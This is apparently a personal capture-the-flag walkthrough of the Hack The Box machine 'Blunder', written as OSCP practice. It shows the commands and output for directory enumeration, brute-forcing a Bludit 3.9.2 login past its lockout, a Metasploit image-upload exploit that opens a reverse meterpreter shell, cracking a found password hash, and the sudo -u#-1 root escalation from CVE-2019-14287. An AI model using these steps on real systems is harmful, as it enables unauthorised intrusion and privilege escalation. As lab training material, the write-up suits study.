Hack The Box - Blunder
Introduction
Blunder is an easy machine with a rating of only 3.3, which is low. So the machine must include something really nasty. I exploited a vulnerability in bludit, found a password for another user and rooted the machine using an exploit in sudo 1.8.25p1. Let’s start enumerating the machine.
Enumeration
I use nmap for the initial scans.
Nmap Scan
For this task, I use the nmap automator. Here are the results of the full scan:
PORT STATE SERVICE
80/tcp open http
Only one open port, the automator will perform a script scan on it:
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Service Enumeration
I ran a dirsearch scan because it is normally pretty fast and finds the most useful things:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/blunder]
└─$ /tools/dirsearch/dirsearch.py -u http://blunder.htb/ -e php,html -x 403,404 -t 50
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, html | HTTP method: GET | Threads: 50 | Wordlist size: 9395
Output File: /tools/dirsearch/reports/blunder.htb/-_21-09-21_08-16-33.txt
Error Log: /tools/dirsearch/logs/errors-21-09-21_08-16-33.log
Target: http://blunder.htb/
[08:16:33] Starting:
[08:16:38] 200 - 7KB - /%3f/
[08:16:55] 200 - 954B - /.github/
[08:16:56] 200 - 563B - /.gitignore
[08:17:29] 200 - 7KB - /0
[08:17:52] 200 - 1KB - /LICENSE
[08:17:55] 200 - 3KB - /README.md
[08:18:18] 200 - 3KB - /about
[08:18:27] 301 - 0B - /admin -> http://10.10.10.191/admin/
[08:18:31] 200 - 2KB - /admin/admin_login
[08:18:31] 200 - 2KB - /admin/cp
[08:18:31] 200 - 2KB - /admin/backup/
[08:18:31] 200 - 2KB - /admin/adminLogin.php
[08:18:31] 200 - 2KB - /admin/config.php
[08:18:31] 200 - 2KB - /admin/db/
[08:18:31] 200 - 2KB - /admin/default/admin.asp
[08:18:31] 200 - 2KB - /admin/admin
[08:18:32] 200 - 2KB - /admin/manage.asp
[08:18:32] 200 - 2KB - /admin/mysql/
[08:18:32] 200 - 2KB - /admin/sysadmin/
[08:18:32] 200 - 2KB - /admin/upload.php
[08:18:32] 200 - 2KB - /admin/uploads.php
[08:18:32] 200 - 2KB - /admin/user_count.txt
[08:20:40] 200 - 30B - /install.php
[08:21:54] 200 - 22B - /robots.txt
[08:22:29] 200 - 118B - /todo.txt
There were a lot more files in the admin directory as shown, but I only listed the most useful ones. I cannot access the files in the admin dir because I would need to login. So I checked was todo.txt:
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
This gives me a username fergus and a possible vulnerability (CMS may not be up to date). I search for an exploit:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/blunder]
└─$ searchsploit bludit
----------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------- ---------------------------------
Bludit - Directory Traversal Image File Upload (Metasploit) | php/remote/47699.rb
Bludit 3.9.12 - Directory Traversal | php/webapps/48568.py
Bludit 3.9.2 - Auth Bruteforce Bypass | php/webapps/48942.py
Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit) | php/webapps/49037.rb
Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass | php/webapps/48746.rb
Bludit 3.9.2 - Directory Traversal | multiple/webapps/48701.txt
bludit Pages Editor 3.0.0 - Arbitrary File Upload | php/webapps/46060.txt
----------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
I need to find the version, so I checked the source code and found these lines:
<!-- Include Bootstrap CSS file bootstrap.css -->
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2">
<!-- Include CSS Styles from this theme -->
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-themes/blogx/css/style.css?version=3.9.2">
This is probably the bludit version (3.9.2). So let’s use one of the authentication bypass:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/blunder]
└─$ searchsploit -m php/webapps/48942.py
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/blunder]
└─$ mv 48942.py bludit-auth-bypass.py
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/blunder]
└─$ ./bludit-auth-bypass.py -l http://blunder.htb/admin -u users.txt -p /usr/share/wordlists/rockyou.txt 1 ⨯
[*] Bludit Auth BF Mitigation Bypass Script by ColdFusionX
Traceback (most recent call last):
File "/hackthebox/oscp-prep/blunder/./bludit-auth-bypass.py", line 99, in <module>
passfile = open(Password_list).readlines()
File "/usr/lib/python3.9/codecs.py", line 322, in decode
(result, consumed) = self._buffer_decode(data, self.errors, final)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xf1 in position 950: invalid continuation byte
I got an error, this is probably caused by the rockyou wordlist. So I generate my own using cewl:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/blunder]
└─$ cewl http://blunder.htb > wordlist.txt
The only username I tried was fergus. Now, I run the script again:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/blunder]
└─$ ./bludit-auth-bypass.py -l http://blunder.htb/admin -u users.txt -p wordlist.txt
[*] Bludit Auth BF Mitigation Bypass Script by ColdFusionX
[┤] Brute Force: Testing -> fergus:CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
[▄] Brute Force: Testing -> fergus:the
But it did not found any password, so I use another tool which may be able to use the rockyou list:
Bludit Brute Force Mitigation Bypass
I edit it a bit:
host = 'http://blunder.htb'
login_url = host + '/admin/'
username = ''
wordlist = []
with open(sys.argv[1]) as file:
for password in file.read().splitlines():
wordlist.append(password.replace('\n',''))
Now, execute it:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/blunder]
└─$ python3 brute-bludit.py ./wordlist.txt
[*] Trying: the
[*] Trying: and
[*] Trying: for
[*] Trying: Load
---snip---
[*] Trying: RolandDeschain
SUCCESS: Password found!
Use fergus:RolandDeschain to login.
I tried to login, and it worked:
Exploitation
Now that I have access to the admin portal, I can use the metasploit module:
msf6 > search bludit
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/bludit_upload_images_exec 2019-09-07 excellent Yes Bludit Directory Traversal Image File Upload Vulnerability
Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/bludit_upload_images_exec
msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
Configure the module:
msf6 exploit(linux/http/bludit_upload_images_exec) > set bluditpass RolandDeschain
bluditpass => RolandDeschain
msf6 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus
bludituser => fergus
msf6 exploit(linux/http/bludit_upload_images_exec) > set rhosts blunder.htb
rhosts => blunder.htb
msf6 exploit(linux/http/bludit_upload_images_exec) > set lhost tun0
lhost => tun0
To exploit the application, run the module:
msf6 exploit(linux/http/bludit_upload_images_exec) > run
[*] Started reverse TCP handler on 10.10.16.6:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading NTvsNmrmdW.png...
[*] Uploading .htaccess...
[*] Executing NTvsNmrmdW.png...
[*] Sending stage (39282 bytes) to 10.10.10.191
[+] Deleted .htaccess
[*] Meterpreter session 1 opened (10.10.16.6:4444 -> 10.10.10.191:51124)
meterpreter > getuid
Server username: www-data (33)
A shell spawned as the user www-data.
Privesc
www-data → hugo
There is another bludit installation in the /var/www folder. Let’s check the config file:
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
There is a password hash. Using crackstation.com, I could crack the password: Password120.
Hugo may reused the password, so maybe I can try to upgrade the shell to hugo:
su hugo
Password: Password120
whoami
hugo
And a shell as user hugo spawned.
User Flag
Time to grab the user flag:
hugo@blunder:~$ ls
ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
hugo@blunder:~$ cat user.txt
cat user.txt
107e**************************d7
hugo → root
I used linpeas to find a way to privesc. I found the following that might be exploitable:
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.25p1
The version as it is, is not vulnerable…. But with the configurations of the machine it is. I found a CVE that matches my state of the machine:
CVE-2019-14287 - Sudo Vulnerability Cheat Sheet
What happens here is that sudo blocks me from executing commands as user root. But when I use the user id -1 that username check is ignored and the command is run as root. This can be done by using the -u#-1 option for sudo:
hugo@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
Password: Password120
root@blunder:/var/www/bludit-3.9.2/bl-content/tmp# whoami
whoami
root
And I got a root shell.
Root Flag
In the root shell I can get the flag:
root@blunder:/root# cat root.txt
cat root.txt
0a70**************************ec
Conclusions
The machine was very easy, the only downside of it was the brute force part. This machine is a very good practice for the OSCP exam, I can only recommend to solve it yourself.